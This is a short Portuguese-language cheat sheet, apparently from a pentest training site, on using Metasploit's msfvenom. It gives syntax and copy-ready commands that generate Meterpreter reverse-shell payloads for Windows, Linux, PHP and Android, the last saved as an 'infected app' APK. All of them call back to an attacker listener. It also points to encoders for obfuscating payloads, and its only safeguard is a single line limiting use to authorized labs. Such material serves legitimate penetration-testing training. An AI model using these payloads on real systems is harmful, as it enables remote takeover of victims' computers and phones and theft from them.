Skip to main content

Msfvenom | Solyd One

  • Msfvenom | Solyd One

📌 MSFVenom – Guia Rápido

O msfvenom é uma ferramenta do Metasploit Framework usada para gerar payloads (códigos maliciosos de teste) em diversos formatos. ⚠️ Uso apenas em ambientes controlados e autorizados (laboratórios, testes de penetração legais).


🔹 Sintaxe básica

msfvenom -p <payload> LHOST=<IP_atacante> LPORT=<porta> -f <formato> -o <arquivo>
  • -p → Tipo de payload (ex: windows/meterpreter/reverse_tcp)
  • LHOST → IP do atacante (quem vai receber a conexão)
  • LPORT → Porta de escuta
  • -f → Formato de saída (exe, elf, apk, php, asp, raw, c, python, etc.)
  • -o → Nome do arquivo gerado

🔹 Exemplos práticos

1. Windows Reverse Shell (EXE)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe

2. Linux Reverse Shell (ELF)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf

3. Payload em PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

4. Payload para Android (APK)

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > app_infectado.apk

🔹 Dicas úteis

  • Listar todos os payloads disponíveis:

    msfvenom -l payloads
  • Listar formatos de saída:

    msfvenom -l formats
  • Encoders para ofuscar o payload:

    msfvenom -l encoders